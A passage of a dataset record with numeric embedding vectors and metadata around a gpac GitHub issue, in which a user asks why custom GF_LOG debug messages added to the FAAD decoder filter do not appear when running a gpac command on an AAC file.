-0.01171069871634245, 0.002801349386572838, 0.0009662180091254413, 0.015855535864830017, -0.003257144708186388, 0.01567799597978592, 0.00048993737436831, 0.00798922311514616, -0.014722021296620369, 0.021987434476614, 0.018026964738965034, -0.01952921226620674, 0.000433176348451525, 0.00614555599167943, -0.0038853571750223637, 0.004506741184741259, 0.014325974509119987, 0.005882663186639547, 0.011662900447845459, 0.005879248958081007, 0.0026511247269809246, 0.02917090617120266, -0.014107465744018555, 0.002792813815176487, 0.009266133420169353, 0.006343579851090908, -0.0044828420504927635, -0.015814565122127533, 0.003687333781272173, -0.00032925669802352786, 0.0008441604441031814, 0.004151664674282074, 0.018190845847129822, -0.002601618878543377, -0.010925433598458767, 0.0011079072719439864, 0.010829836130142212, -0.005797307938337326, 0.007231271360069513, -0.005964603740721941, 0.015391204506158829, 0.013390484265983105, 0.025975218042731285, 0.00297547341324389, -0.018395697697997093, 0.030673153698444366, -0.02421349100768566, -0.00199730577878654, 0.034278545528650284, -0.03340451046824455, -0.0014945651637390256, -0.013554365374147892, 0.003250316483899951, 0.02313460409641266, 0.01362947840243578, -0.008023365400731564, 0.003721475601196289, 0.006087515037506819, 0.004496498499065638, 0.021222654730081558, 0.01894197054207325, 0.00019716992392204702, 0.017385095357894897, -0.002495778724551201, 0.0035917360801249743, -0.028651949018239975, 0.006439177319407463, 0.01080252230167389 ]
2,270
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
All the logs I am seeing when running the filter are per-existent logs. Not seeing any logs that I have added. I have added logs in FAAD filter using following statement. `GF_LOG(GF_LOG_DEBUG, GF_LOG_CODEC, ("[FAAD]: FAAD decode process 1"));` and checking log with command `gpac.exe -logs=codec:parser:media@debug:ncl -i aac-test.aac @ rfadts @ faad @ aout`
How can I print custom logs in existing filter ?
https://api.github.com/repos/gpac/gpac/issues/1796/comments
4
2021-05-21T13:29:03
2021-05-27T08:47:19Z
https://github.com/gpac/gpac/issues/1796
898,045,081
1,796
false
This is a GitHub Issue repo:gpac owner:gpac Title : How can I print custom logs in existing filter ? Issue date: --- start body --- All the logs I am seeing when running the filter are per-existent logs. Not seeing any logs that I have added. I have added logs in FAAD filter using following statement. `GF_LOG(GF_LOG_DEBUG, GF_LOG_CODEC, ("[FAAD]: FAAD decode process 1"));` and checking log with command `gpac.exe -logs=codec:parser:media@debug:ncl -i aac-test.aac @ rfadts @ faad @ aout` --- end body ---
520
[ 0.02324748784303665, 0.05101895332336426, -0.017389852553606033, -0.007792746182531118, 0.009433668106794357, 0.003880029311403632, -0.025940952822566032, 0.03208623826503754, -0.018775811418890953, 0.03255694359540939, -0.02273755893111229, 0.01606927067041397, 0.011061515659093857, 0.043173905462026596, 0.020841673016548157, 0.017246026545763016, -0.028346767649054527, 0.02779761515557766, 0.00794964749366045, -0.00486719748005271, 0.04670417681336403, -0.01271551288664341, -0.006495044566690922, 0.027170009911060333, 0.02314288727939129, 0.008936814963817596, -0.050914350897073746, 0.02150850184261799, -0.028111416846513748, -0.014317209832370281, 0.029078971594572067, 0.04034968838095665, 0.0020266370847821236, -0.0068840282037854195, 0.02821601741015911, 0.008119623176753521, 0.034596655517816544, 0.027353061363101006, 0.019704140722751617, 0.03187703713774681, -0.051489654928445816, -0.0071324547752738, -0.040062036365270615, 0.011009215377271175, -0.033210694789886475, 0.0031903188209980726, 0.035015057772397995, 0.030595680698752403, -0.0358518622815609, -0.011277254670858383, 0.009636332280933857, -0.03391674906015396, -0.014905588701367378, -0.030308028683066368, -0.01393803209066391, 0.004716834053397179, 0.029209723696112633, -0.03041262924671173, -0.008015022613108158, 0.008302673697471619, 0.007557394914329052, 0.020645547658205032, 0.017651354894042015, -0.011989845894277096, 0.02363974042236805, -0.0010321139125153422, -0.05559523031115532, 0.01956031657755375, 0.016605347394943237, 0.02632013149559498, 0.021743854507803917, 0.020174844190478325, 0.017664428800344467, 0.02150850184261799, 0.011153041385114193, -0.02169155329465866, 0.05143735557794571, 0.032164689153432846, 0.0018207045504823327, -0.019625691697001457, -0.0059883855283260345, -0.016827624291181564, -0.03553805872797966, -0.00831574946641922, -0.021090099588036537, 0.018239732831716537, 0.015350140631198883, -0.03878067806363106, -0.009106791578233242, 0.015467816963791847, 0.018566610291600227, 0.019704140722751617, 0.03825767710804939, -0.03383830189704895, -0.007289355620741844, 0.019913343712687492, -0.01129032950848341, -0.027823764830827713, -0.008269986137747765, -0.035825710743665695, 0.009603644721210003, -0.011669506318867207, -0.04207560047507286, -0.013009701855480671, 0.023992767557501793, 0.036479465663433075, -0.00961671955883503, -0.06051145866513252, -0.03242619335651398, 0.07123301923274994, 0.011839482933282852, -0.012682825326919556, -0.006285843439400196, 0.007858121767640114, 0.011198803782463074, 0.06228967010974884, -0.014317209832370281, -0.02077629789710045, 0.01604311913251877, 0.015167090110480785, -0.01735062710940838, -0.026359356939792633, 0.015415516681969166, -0.0022717947140336037, -0.024411169812083244, 0.06814730167388916, -0.018618909642100334, -0.020580172538757324, 0.00238620163872838, -0.015938518568873405, -0.05847174674272537, -0.027823764830827713, 0.007661995477974415, 0.0187496617436409, -0.004553395789116621, -0.005645164754241705, -0.034439753741025925, 0.05329401418566704, 0.009283305145800114, -0.011924470774829388, -0.012813575565814972, -0.04866543784737587, 0.01605619490146637, -0.0037819661665707827, -0.013042389415204525, -0.0252741239964962, 0.0244503952562809, 0.0016482769278809428, -0.036401014775037766, -0.021233925595879555, -0.023535139858722687, -0.016409222036600113, 0.03208623826503754, -0.0036185276694595814, 0.021495427936315536, 0.01072156336158514, -0.02706540934741497, -0.006272768601775169, -0.0008686754736118019, -0.03284459561109543, -0.022057656198740005, -0.038676079362630844, -0.002959870733320713, -0.0063512190245091915, 0.0013115936890244484, 0.012918176129460335, -0.009283305145800114, 0.009512118995189667, -0.022371457889676094, 0.011846019886434078, 0.019259588792920113, 0.0067336647771298885, 0.007439719047397375, 0.009407518431544304, -0.05454922467470169, 0.011767569929361343, -0.021260075271129608, 0.0423894003033638, -0.017585979774594307, 0.0009381368290632963, -0.01153875607997179, 0.01980874314904213, -0.028922071680426598, -0.03161553665995598, 0.012872413732111454, 0.01605619490146637, 0.012434398755431175, -0.06406787782907486, 0.043827660381793976, -0.019298814237117767, -0.005452307406812906, 0.024659596383571625, 0.01214674673974514, -0.017886705696582794, 0.015062489546835423, 0.00893027801066637, -0.05925625190138817, -0.02046249620616436, -0.014526410959661007, 0.019455716013908386, 0.003716590814292431, -0.016500746831297874, -0.008348437026143074, -0.000353844283381477, -0.032478492707014084, -0.008256911300122738, 0.007367806043475866, 0.029209723696112633, -0.00595242902636528, -0.02088089846074581, -0.029654275625944138, -0.010008972138166428, 0.01030969899147749, -0.023927392438054085, 0.010636575520038605, -0.002203150652348995, 0.02029252052307129, 0.0010786938946694136, -0.0024270613212138414, -0.011721806600689888, 0.033550649881362915, -0.027823764830827713, -0.0023371700663119555, 0.015912368893623352, -0.014108008705079556, 0.019102688878774643, 0.01745522767305374, 0.001497913501225412, -0.023822791874408722, 0.03284459561109543, 0.050495948642492294, 0.0051809996366500854, -0.00595242902636528, 0.018540460616350174, -0.0023486106656491756, -0.013506554998457432, -0.017010675743222237, -0.016657648608088493, 0.029968077316880226, 0.007145529612898827, -0.01202907133847475, 0.046181172132492065, -0.0350412055850029, -0.0014309037942439318, 0.007590082474052906, 0.011721806600689888, 0.00039449959876947105, 0.011205341666936874, -0.022136105224490166, 0.009747469797730446, -0.0037362033035606146, -0.00006568183744093403, -0.009381367824971676, -0.01185909565538168, -0.01365038100630045, 0.027588414028286934, 0.025326425209641457, 0.010460061952471733, -0.03449205309152603, -0.07154682278633118, -0.018631985411047935, 0.022149180993437767, -0.003291650675237179, -0.06919331103563309, -0.029941927641630173, -0.07604464888572693, -0.009760545566678047, -0.012643599882721901, 0.03742087259888649, -0.0071128420531749725, -0.02055402100086212, 0.032007791101932526, -0.03213854134082794, 0.048874638974666595, 0.0195733904838562, -0.009459818713366985, -0.02740536257624626, -0.006606183014810085, -0.007178217638283968, 0.027588414028286934, -0.024437319487333298, 0.001081145484931767, -0.0005556907854042947, 0.04142184555530548, 0.02845136821269989, 0.01214674673974514, 0.014644086360931396, -0.013114302419126034, -0.03919908031821251, 0.03472740575671196, 0.018801961094141006, 0.046024274080991745, -0.03930368274450302, -0.013728830963373184, 0.003497583093121648, -0.015297840349376202, 0.009525193832814693, -0.02624168060719967, 0.02764071337878704, 0.010773863643407822, -0.0049946797080338, 0.011944083496928215, 0.04754098132252693, -0.028059115633368492, -0.018880411982536316, 0.014722537249326706, -0.030203428119421005, 0.050600551068782806, 0.033472198992967606, -0.027326911687850952, 0.01728525198996067, -0.03710706904530525, -0.04045429080724716, -0.010983064770698547, -0.017507528886198997, -0.008034635335206985, -0.03187703713774681, -0.01418645866215229, -0.038205377757549286, 0.002178634749725461, -0.00021676026517525315, -0.009394442662596703, -0.053110964596271515, 0.0142649095505476, -0.007145529612898827, -0.00594916008412838, -0.01973029226064682, 0.012172897346317768, -0.013225440867245197, 0.006982091348618269, 0.026542406529188156, 0.014526410959661007, -0.008642625994980335, -0.017154501751065254, -0.04139569401741028, -0.06799039989709854, -0.01487943809479475, -0.018069757148623466, 0.03153708577156067, -0.033210694789886475, -0.028163716197013855, -0.0003781557606998831, -0.005256181117147207, -0.04066349193453789, 0.03545961156487465, -0.008204611018300056, 0.01582084409892559, 0.029392773285508156, 0.02413659356534481, 0.02714386023581028, 0.0007567200809717178, 0.028320617973804474, 0.032007791101932526, 0.0014031192986294627, 0.030778732150793076, -0.009080640971660614, -0.01817435771226883, -0.031092533841729164, 0.014134158380329609, -0.005073130130767822, 0.0034289390314370394, -0.026150153949856758, 0.04163104668259621, 0.033969052135944366, -0.0057072713971138, 0.039329834282398224, -0.02217533066868782, 0.006838265340775251, -0.03389060124754906, -0.01606927067041397, 0.005635358393192291, 0.024738047271966934, -0.03734242171049118, -0.007969259284436703, -0.025980178266763687, -0.02536565065383911, -0.017062975093722343, 0.02609785459935665, -0.02069784700870514, 0.024241194128990173, -0.012846263125538826, 0.008348437026143074, 0.024816496297717094, -0.021168550476431847, -0.0036642905324697495, 0.019874118268489838, -0.028111416846513748, 0.012199047021567822, -0.02233223244547844, -0.03430900350213051, -0.037054769694805145, 0.023587439209222794, -0.04380150884389877, -0.006106060929596424, -0.042363252490758896, -0.018135132268071175, -0.03438745439052582, 0.0032017596531659365, 0.017638279125094414, -0.028791319578886032, 0.023822791874408722, -0.012813575565814972, -0.00595242902636528, -0.01907653734087944, -0.059151649475097656, 0.020841673016548157, 0.0055928644724190235, 0.024005841463804245, 0.010505824349820614, 0.03208623826503754, 0.020933199673891068, 0.0065211947076022625, -0.03569496050477028, -0.014277984388172626, 0.006132211070507765, 0.03187703713774681, -0.03731627017259598, -0.004337656777352095, -0.008544563315808773, 0.042598601430654526, -0.006364293862134218, 0.028895920142531395, -0.02356128953397274, 0.016683798283338547, 0.0051679243333637714, 0.011800257489085197, 0.011604131199419498, 0.02894822135567665, 0.018723510205745697, -0.03545961156487465, 0.005808603018522263, -0.026071704924106598, 0.003038321156054735, -0.0008596863481216133, 0.014984038658440113, -0.005131967831403017, -0.024724971503019333, -0.05601363256573677, -0.038676079362630844, 0.027902215719223022, -0.04900538921356201, -0.012970476411283016, 0.009244079701602459, 0.009361755102872849, -0.01793900690972805, -0.04165719822049141, -0.04037583991885185, -0.03145863488316536, -0.008943352848291397, -0.021220849826931953, 0.026882359758019447, -0.008400737307965755, 0.0022358382120728493, -0.019220363348722458, -0.0034060575999319553, -0.0038538791704922915, 0.0391467809677124, 0.013186215423047543, 0.07573084533214569, -0.003185415640473366, -0.004036929924041033, 0.016030045226216316, -0.03271384537220001, 0.008551100268959999, 0.02616322971880436, -0.008322286419570446, -0.020488645881414413, -0.043252356350421906, 0.01857968419790268, 0.012695900164544582, 0.015794694423675537, -0.011146503500640392, 0.03389060124754906, -0.003131481120362878, -0.0018860799027606845, 0.024973398074507713, -0.00786465872079134, -0.0256794523447752, 0.06129596382379532, -0.02583635225892067, 0.009198317304253578, -0.0035956462379544973, -0.015624717809259892, 0.03817922621965408, -0.017259102314710617, 0.0027179818134754896, 0.023613588884472847, -0.021168550476431847, -0.011473380029201508, 0.026764683425426483, 0.011342629790306091, 0.00916562881320715, 0.02102472446858883, -0.016670724377036095, 0.003265500534325838, 0.0004335205303505063, -0.017429077997803688, 0.03365524858236313, 0.05575212836265564, -0.006547344848513603, 0.029314324259757996, 0.007367806043475866, 0.03284459561109543, -0.040245089679956436, -0.003293285146355629, -0.0059589664451777935, -0.018475083634257317, -0.01166296936571598, -0.0027898945845663548, -0.0007232152274809778, -0.04659957438707352, -0.008250373415648937, -0.02745766192674637, -0.06009305641055107, -0.028974371030926704, -0.027248460799455643, 0.006812115199863911, 0.0085641760379076, 0.03600876405835152, -0.005383663345128298, -0.014814062975347042, -0.008976040408015251, -0.018645061179995537, 0.012048684060573578, -0.00035118841333314776, 0.046102721244096756, -0.00860340055078268, -0.016919150948524475, 0.027117710560560226, -0.013375803828239441, -0.014500261284410954, 0.02845136821269989, -0.0012690996518358588, 0.024267343804240227, 0.025535626336932182, -0.011525680311024189, 0.000557325198315084, -0.011721806600689888, -0.0005646799108944833, 0.0048181661404669285, -0.058733247220516205, -0.008368049748241901, -0.033289145678281784, -0.0010288452031090856, 0.0005483360728248954, 0.01809590682387352, -0.023129811510443687, 0.01695837453007698, -0.021390827372670174, 0.003667559241876006, -0.029811177402734756, 0.016814550384879112, 0.006553882732987404, 0.03373369947075844, 0.008505337871611118, 0.02267218381166458, 0.004357269499450922, 0.01647459715604782, -0.011715269647538662, 0.008917203173041344, 0.011440692469477654, 0.03930368274450302, 0.039094481617212296, -0.026359356939792633, -0.013611155562102795, 0.011100741103291512, 0.010139722377061844, -0.006468894425779581, -0.039983585476875305, -0.023365164175629616, 0.012617449276149273, -0.0074593317694962025, 0.0053803944028913975, -0.010558124631643295, -0.033707547932863235, 0.009106791578233242, 0.042755503207445145, -0.009754007682204247, 0.001269916887395084, -0.014735612086951733, 0.0036740966606885195, -0.00045272454735822976, -0.022619884461164474, 0.012055221013724804, -0.00535751273855567, -0.025627151131629944, -0.025051848962903023, -0.004095768090337515, -0.029131272807717323, -0.02577097713947296, 0.005556907970458269, 0.009237541817128658, -0.02910512313246727, -0.004458601586520672, 0.014317209832370281, -0.009917446412146091, -0.014722537249326706, 0.02771916426718235, 0.019298814237117767, 0.0002925548469647765, -0.021560803055763245, 0.023365164175629616, 0.007054004352539778, -0.027117710560560226, -0.007577007170766592, -0.01801745593547821, 0.013415029272437096, -0.021456202492117882, -0.01320582814514637, -0.001192283583804965, -0.006344681140035391, 0.0014505163999274373, 0.04607657343149185, -0.02430656924843788, 0.009708245284855366, 0.026124004274606705, 0.013179678469896317, -0.02022714540362358, -0.011022290214896202, 0.004331119358539581, 0.011970233172178268, -0.02251528389751911, 0.026699308305978775, -0.0033227039966732264, 0.0317985899746418, 0.03007267788052559, 0.00868185143917799, -0.03483200445771217, -0.02224070578813553, 0.0005630454979836941, -0.017651354894042015, 0.0028781513683497906, -0.030935633927583694, -0.014905588701367378, -0.06176666542887688, 0.025156449526548386, -0.006302187219262123, 0.013741906732320786, -0.011741419322788715, -0.009427131153643131, 0.002726153703406453, -0.025417950004339218, 0.002090377965942025, 0.034596655517816544, -0.011689119040966034, -0.01622617058455944, 0.007335118483752012, -0.013519629836082458, -0.0027768195141106844, -0.009570956230163574, 0.017023751512169838, -0.042755503207445145, -0.010734638199210167, 0.008590325713157654, 0.016173871234059334, -0.017232952639460564, 0.01470946241170168, 0.028059115633368492, -0.009244079701602459, -0.01817435771226883, -0.00937483087182045, 0.0031543623190373182, -0.0057628401555120945, -0.03441360220313072, -0.015951594337821007, -0.0008233212865889072, -0.02014869451522827, -0.02624168060719967, -0.014539485797286034, 0.02469882182776928, 0.017010675743222237, -0.03480585664510727, 0.02438502013683319, 0.002999095944687724, 0.0010133185423910618, -0.0055634453892707825, 0.00010521351214265451, 0.0023339013569056988, -0.005906666163355112, -0.005037173628807068, -0.017102200537919998, -0.019547240808606148, -0.002049518283456564, -0.015716243535280228, -0.030517229810357094, 0.023822791874408722, -0.004102305509150028, -0.021796153858304024, -0.03294919431209564, -0.007923496887087822, 0.02329978719353676, 0.0004106391570530832, 0.005795528180897236, 0.028320617973804474, -0.02860826998949051, -0.009525193832814693, 0.00811308529227972, -0.005220224615186453, -0.04654727503657341, 0.004197099711745977, -0.02193997986614704, 0.024411169812083244, -0.0034648955333977938, -0.01202253345400095, 0.006508119869977236, -0.012421323917806149, -0.007165142334997654, -0.009577494114637375, -0.013238515704870224, 0.02600632980465889, 0.00274086301214993, 0.010022046975791454, -0.012414786033332348, 0.041212644428014755, -0.02356128953397274, 0.003182146931067109, 0.010852314531803131, 0.013264666311442852, 0.004190562292933464, 0.020070243626832962, 0.0005969590274617076, -0.007805821020156145, -0.038126926869153976, 0.005635358393192291, 0.0281375665217638, 0.025287199765443802, 0.03072643280029297, -0.004246131516993046, -0.012970476411283016, 0.013728830963373184, -0.015755468979477882, 0.004239593632519245, 0.031040234491229057, 0.008551100268959999, -0.0456320196390152, -0.021090099588036537, -0.01786055602133274, 0.02714386023581028, 0.01639614626765251, -0.004948916845023632, -0.011545293033123016, 0.011061515659093857, -0.010930764488875866, 0.0017455228371545672, 0.008505337871611118, 0.022136105224490166, -0.01941649056971073, -0.006328337360173464, -0.009270230308175087, -0.012499773874878883, 0.00925061758607626, 0.023783566430211067, 0.004376882221549749, -0.030046528205275536, 0.004249399993568659, 0.0053967381827533245, 0.020815523341298103, -0.03862378001213074, 0.02503877319395542, -0.0034027888905256987, -0.01507556438446045, 0.003896373091265559, -0.011061515659093857, -0.009590568952262402, -0.009597106836736202, 0.00009361959382658824, -0.024672670289874077, -0.019586466252803802, 0.0030285147950053215, -0.027509963139891624, 0.012486699037253857, 0.024829572066664696, -0.02745766192674637, -0.00476913433521986, 0.00007395590364467353, -0.012983552180230618, -0.004265743773430586, 0.029445074498653412, -0.01565086841583252, -0.008819139562547207, 0.015167090110480785, -0.021822303533554077, -0.05198650807142258, 0.005507876165211201, 0.02396661601960659, -0.018383558839559555, 0.02510414831340313, -0.003226275322958827, 0.018527384847402573, -0.021560803055763245, 0.014160308986902237, -0.0256794523447752, 0.02535257488489151, -0.024149667471647263, 0.02845136821269989, 0.016892999410629272, 0.0014644087059423327, 0.008544563315808773, -0.02307751215994358, -0.019586466252803802, 0.008394199423491955, 0.0057072713971138, -0.005981848109513521, -0.032243140041828156, -0.01226442214101553, -0.022528357803821564, -0.014447960071265697, -0.014696386642754078, -0.02209688164293766, -0.02111624926328659, 0.0055928644724190235, 0.009649407118558884, 0.006851340644061565, -0.00954480655491352, -0.010858851484954357, 0.0024842647835612297, 0.018292034044861794, -0.046991828829050064, 0.008021559566259384, 0.03279229253530502, -0.03391674906015396, 0.01495788898319006, 0.025954028591513634, -0.0032360816840082407, 0.0252741239964962, -0.014461035840213299, -0.01153875607997179, 0.012780888006091118, 0.020567096769809723, 0.008158848620951176, 0.03496275842189789, 0.0061550927348434925, 0.018318183720111847, -0.012702438049018383, -0.027849914506077766, 0.020763222128152847, 0.027196161448955536, 0.0007983969408087432, -0.007563932333141565, 0.035171959549188614, -0.006164899095892906, -0.0212077759206295, 0.007119379471987486, -0.01752060279250145, 0.03169398754835129, -0.024659596383571625, -0.018030531704425812, 0.009355218149721622, -0.021717702969908714, -0.0014415272744372487, 0.006759814918041229, 0.00548499496653676, 0.03815307468175888, 0.020004868507385254, -0.00185012340079993, -0.010649650357663631, -0.018278958275914192, -0.012552074156701565, 0.009655945003032684, -0.03734242171049118, 0.016095420345664024, -0.008819139562547207, -0.04008818790316582, -0.008786452002823353, -0.0042559378780424595, -0.030517229810357094, 0.00022554508177563548, -0.04131724312901497, 0.001499547972343862, -0.002657509408891201, -0.022057656198740005, -0.01251284871250391, -0.014591786079108715, -0.03710706904530525, 0.0031069652177393436, 0.0034518204629421234, -0.01480098720639944, -0.003974823746830225, -0.026686232537031174, 0.009642869234085083, -0.032975345849990845, 0.0068971035070717335, -0.001995583763346076, 0.0002753938315436244, -0.0033668323885649443, -0.03245234116911888, -0.017180651426315308, 0.00847918726503849, -0.019037311896681786, -0.009446743875741959, -0.01010049693286419, 0.02387509122490883, -0.005739958956837654, -0.012133671902120113, 0.017965156584978104, 0.00949904415756464, 0.017180651426315308, -0.02047557197511196, 0.0035073894541710615, 0.013663455843925476, -0.03613951429724693, -0.008773377165198326, -0.019024237990379333, -0.013663455843925476, 0.011061515659093857, -0.004108842927962542, 0.028974371030926704, 0.004187293350696564, -0.025287199765443802, 0.003025246085599065, -0.009394442662596703, -0.001755329198203981, 0.005857634823769331, -0.021573876962065697, -0.014539485797286034, -0.0005683572962880135, -0.012218659743666649, 0.010394686833024025, -0.004569739568978548, 0.03718551993370056, 0.008734151721000671, 0.02577097713947296, 0.03145863488316536, -0.0083615118637681, -0.014081858098506927, 0.002222763141617179, 0.003683903021737933, 0.026385506615042686, 0.00735473120585084, -0.008021559566259384, 0.02234530635178089, -0.005478457547724247, 0.020122544839978218, -0.0028225823771208525, -0.010878464207053185, -0.023208262398838997, -0.033210694789886475, 0.01177410688251257, -0.027614563703536987, -0.022462982684373856, 0.022149180993437767, 0.033707547932863235, -0.016657648608088493, 0.005726884119212627, -0.011381855234503746, 0.02111624926328659, -0.035015057772397995, -0.019547240808606148, -0.019677991047501564, 0.029235873371362686, -0.01572931744158268, -0.010263935662806034, -0.01817435771226883, -0.047645583748817444, -0.029131272807717323, -0.014094933867454529, -0.020070243626832962, 0.021220849826931953, 0.041212644428014755, -0.017572904005646706, 0.016932224854826927, 0.031040234491229057, 0.012793962843716145, -0.010610424913465977, -0.020920123904943466, -0.0014014848275110126, -0.013728830963373184, -0.017572904005646706, -0.004530514124780893, -0.017978232353925705, -0.011591056361794472, -0.030046528205275536, -0.015598567202687263, 0.019625691697001457, -0.0008850193116813898, 0.020004868507385254, 0.0019825086928904057, -0.025143373757600784, -0.02672545798122883, -0.023848941549658775, -0.031118683516979218, -0.009211392141878605, 0.021626178175210953, -0.005504607688635588, 0.0014219146687537432, -0.025692526251077652, 0.015690091997385025, 0.0171283520758152, 0.0023437077179551125, -0.003036686684936285, 0.006864415481686592, 0.02656855806708336, 0.015167090110480785, -0.031929340213537216, 0.0281375665217638, -0.012185972183942795, 0.011133428663015366, -0.017873629927635193, -0.021900754421949387, -0.0025643494445830584, -0.018618909642100334, -0.0301511287689209, 0.02642473205924034, -0.03723781928420067, -0.004641652572900057, -0.0007653006468899548, -0.006347950082272291, 0.001416194369085133, -0.02656855806708336, 0.007701220456510782, -0.010741176083683968, -0.0167230237275362, -0.006838265340775251, 0.021913830190896988, -0.005063323769718409, -0.0025381993036717176, 0.006099523510783911, -0.031197134405374527, 0.0018305107951164246, 0.01622617058455944, -0.008269986137747765, -0.0036544841714203358, -0.014604861848056316, 0.004239593632519245, -0.0027179818134754896, 0.0167230237275362, 0.00678596505895257, 0.022959835827350616, 0.020031018182635307, 0.010577737353742123, 0.0317985899746418, -0.019063463434576988, -0.014029557816684246, 0.04840393736958504, 0.006772890221327543, -0.033472198992967606, 0.000925061700399965, -0.06051145866513252, -0.01234941091388464, -0.007184755057096481, -0.00477240327745676, -0.007302430924028158, -0.039408281445503235, -0.01418645866215229, -0.010937302373349667, 0.023221338167786598, -0.010499287396669388, 0.001520794932730496, 0.013382341712713242, 0.00607664231210947, 0.016762249171733856, 0.012931251898407936, 0.046442676335573196, -0.017102200537919998, 0.01153875607997179, -0.011061515659093857, -0.0014562366995960474, -0.0035923775285482407, -0.0032393503934144974, 0.015010189265012741, -0.010695413686335087, -0.043487709015607834, 0.018880411982536316, -0.0042820880189538, -0.0167230237275362, -0.001748791546560824, -0.000019612616597441956, 0.016814550384879112, 0.0022521819919347763, 0.011107278056442738, -0.00954480655491352, 0.010120109654963017, -0.0047887470573186874, 0.005700733978301287, 0.01687992550432682, -0.03080488182604313, -0.011381855234503746, -0.01214674673974514, -0.022802935913205147, -0.02941892482340336, 0.010728101246058941, -0.011715269647538662, 0.03208623826503754, 0.021495427936315536, -0.04045429080724716, -0.03229543939232826, 0.005811871960759163, 0.01629154570400715, 0.015193239785730839, -0.025143373757600784, -0.016265396028757095, -0.0040598115883767605, -0.02558792568743229, -0.016814550384879112, -0.010950377210974693, 0.03634871542453766, 0.033289145678281784, 0.05175115540623665, 0.03799617663025856, -0.028320617973804474, 0.009008727967739105, -0.001967799151316285, 0.002351879607886076, 0.02346976473927498, -0.015402440913021564, 0.00322137214243412, -0.010623500682413578, 0.0005981847643852234, 0.009780158288776875, -0.028791319578886032, -0.012493236921727657, -0.018239732831716537, 0.022972911596298218, -0.004778940696269274, -0.011113815940916538, -0.0018566609360277653, 0.005478457547724247, -0.02110317535698414, 0.004899885039776564, 0.017821330577135086, -0.0048018223606050014, 0.0038211913779377937, -0.02379664033651352, 0.002534930594265461, 0.015284765511751175, 0.026437805965542793, 0.00418075593188405, -0.027614563703536987, -0.006017804145812988, 0.004318044520914555, 0.0301511287689209, 0.017154501751065254, 0.002629725029692054, 0.023822791874408722, -0.01963876560330391, 0.002049518283456564, 0.009688632562756538, 0.008256911300122738, -0.003922522999346256, 0.003978092223405838, 0.015559341758489609, 0.00941405538469553, -0.007472406607121229, 0.023953542113304138, 0.01745522767305374, -0.00700824148952961, -0.007204367779195309, -0.005301943980157375, -0.028922071680426598, 0.01784748025238514, 0.024175819009542465, -0.011231491342186928, 0.028660569339990616, -0.027431512251496315, 0.00740049360319972, -0.019874118268489838, -0.048142433166503906, 0.013545780442655087, 0.010525437071919441, 0.027588414028286934, -0.00035609156475402415, -0.020998574793338776, 0.0017095663351938128, -0.0142649095505476, 0.011643356643617153, 0.020436346530914307, 0.026751607656478882, 0.007982335053384304, 0.013846507295966148, -0.00501429196447134, 0.012826651334762573, 0.014356435276567936, 0.028111416846513748, 0.005282331258058548, 0.00185012340079993, -0.00513850525021553, -0.016579197719693184, 0.014251834712922573, -0.016108496114611626, -0.01164989359676838, -0.006102792453020811, -0.002747400663793087, 0.0031772437505424023, -0.00523983733728528, -0.024188892915844917, -0.012820113450288773, -0.005488263908773661, -0.004020586144179106, 0.015520117245614529, 0.04751482978463173, 0.005870709661394358, 0.008269986137747765, 0.006053760647773743, -0.010623500682413578, -0.008021559566259384, -0.015389366075396538, -0.006132211070507765, -0.009479431435465813, -0.0040598115883767605, 0.0126370619982481, 0.01544166635721922, -0.020004868507385254, 0.0011081128614023328, -0.001376151922158897, 0.014356435276567936, -0.0021377750672399998, -0.0014398929197341204, -0.023012137040495872, -0.03041262924671173, -0.004069617949426174, -0.03083103336393833, 0.005350975319743156, -0.013872656971216202, 0.010826163925230503, 0.008171923458576202, 0.017481379210948944, 0.004357269499450922, 0.0034289390314370394, 0.0002606843481771648, -0.004997948184609413, -0.008060785010457039, 0.002919011050835252, 0.010976527817547321, -0.02217533066868782, -0.008845290169119835, 0.0415525957942009, 0.032896894961595535, -0.01320582814514637, 0.022685259580612183, -0.00700824148952961, 0.00819153618067503, 0.027196161448955536, 0.0003910265222657472, 0.023051360622048378, -0.011813332326710224, 0.020331745967268944, -0.004808359779417515, -0.021874604746699333, 0.04163104668259621, 0.020841673016548157, 0.02609785459935665, 0.007603157311677933, 0.0008948256145231426, -0.005530757829546928, -0.017808254808187485, 0.0022113225422799587, 0.0022995793260633945, -0.026189379394054413, 0.012401711195707321, 0.009100253693759441, 0.0031903188209980726, 0.0281375665217638, 0.03415210172533989, 0.005468651186674833, -0.014447960071265697, -0.009669019840657711, 0.026280906051397324, 0.0002952107461169362, 0.018971936777234077, -0.0067336647771298885, -0.016853773966431618, -0.0065506137907505035, 0.006759814918041229, -0.020344819873571396, -0.03953903540968895, -0.024921096861362457, -0.010819626972079277, 0.02183537930250168, 0.003880029311403632, 0.0036740966606885195, 0.0014300865586847067, -0.011689119040966034, 0.0037198595236986876, -0.015428591519594193, -0.03480585664510727, 0.004161143209785223, 0.025077998638153076, -0.016579197719693184, 0.009682094678282738, -0.01495788898319006, 0.0024826303124427795, 0.035668812692165375, 0.0002210505335824564, -0.010041659697890282, 0.006233543157577515, -0.006969016045331955, 0.009891295805573463, 0.004579545930027962, 0.02226685732603073, 0.0012135306606069207, -0.034047503024339676, -0.037525471299886703, -0.00868185143917799, -0.004961991682648659, -0.008766839280724525, -0.006573494989424944, 0.014225684106349945, -0.004337656777352095, 0.002814410487189889, -0.0016343846218660474, 0.013467329554259777, -0.022201482206583023, -0.04100344330072403, 0.002652606228366494, 0.0012641965877264738, 0.0126370619982481, -0.006495044566690922, -0.016487672924995422, 0.02552255056798458, 0.0018730048323050141, 0.03164168819785118, 0.009276767261326313, 0.02258065901696682, 0.013042389415204525, -0.0028013354167342186, -0.0040924991481006145, 0.008989116176962852, -0.008649163879454136, 0.006161630153656006, 0.006942865904420614, 0.019795667380094528, 0.009021803736686707, -0.027326911687850952, 0.01653997227549553, 0.0009667385602369905, 0.007119379471987486, 0.002534930594265461, -0.01914191246032715, -0.007701220456510782, 0.030778732150793076, -0.004579545930027962, 0.0007003338541835546, -0.0010958549100905657, 0.00381138501688838, -0.019991792738437653, 0.015219390392303467, -0.0012233369052410126, 0.017337553203105927, -0.01867121085524559, -0.018396634608507156, 0.018958862870931625, 0.01923343911767006, -0.00014137427206151187, 0.008989116176962852, 0.01924651302397251, 0.006792502477765083, 0.0069297910667955875, 0.003370101097971201, 0.01647459715604782, -0.009904371574521065, -0.009270230308175087, -0.013545780442655087, 0.044716764241456985, -0.0048345099203288555, 0.00847918726503849, 0.04058504104614258, -0.022044580429792404, -0.016252322122454643, -0.005285600200295448, -0.011035365052521229, -0.005766109097748995, -0.023600514978170395, 